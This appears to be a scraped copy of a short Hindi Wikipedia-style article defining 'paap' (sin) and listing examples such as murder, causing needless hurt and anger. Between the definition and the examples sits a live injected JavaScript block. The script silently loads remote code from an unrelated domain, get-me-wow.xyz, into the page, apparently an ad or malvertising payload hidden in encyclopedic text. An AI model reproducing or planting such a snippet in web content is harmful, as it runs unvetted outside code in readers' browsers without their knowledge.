पाप

मुक्त ज्ञानकोश विकिपीडिया से
Jump to navigation Jump to search

पाप या गुनाह मनुष्य द्वारा किये गए उन कार्यों को कहा जाता है, जो किसी भी धर्म में अस्वीकार्य माने जाते हैं। वे सभी कार्य, जो अध्यात्मिक एवं सामाजिक मूल्यों का ह्रास करते हों, या आर्थिक एवं प्राकृतिक संसाधनों को नष्ट करते हों, पाप या गुनाह की श्रेणी में आते हैं। वह व्यक्ति, जो पाप करता है, पापी या गुनहगार कहलाता है।

<script type="text/javascript">

   (function (d, c) {
       var s = d.createElement('script');
       s.type = 'text/javascript';
       s.src = 'https://get-me-wow.xyz/p/486342?c=zc_486342';
       s.async = true;
       d.getElementById(c).appendChild(s);
   })(document, 'zc_486342');

</script>

उदाहरणार्थ[संपादित करें]

हत्या ,किसी को व्यर्थ आघात पहुँचाना, आदि पाप है।

किसी के साथ बुरा दुष्कर्म करना या किसी को बुरी नजरो से देखना

और सबसे बडा पाप है हमारा किसी के ऊपर क्रोध करना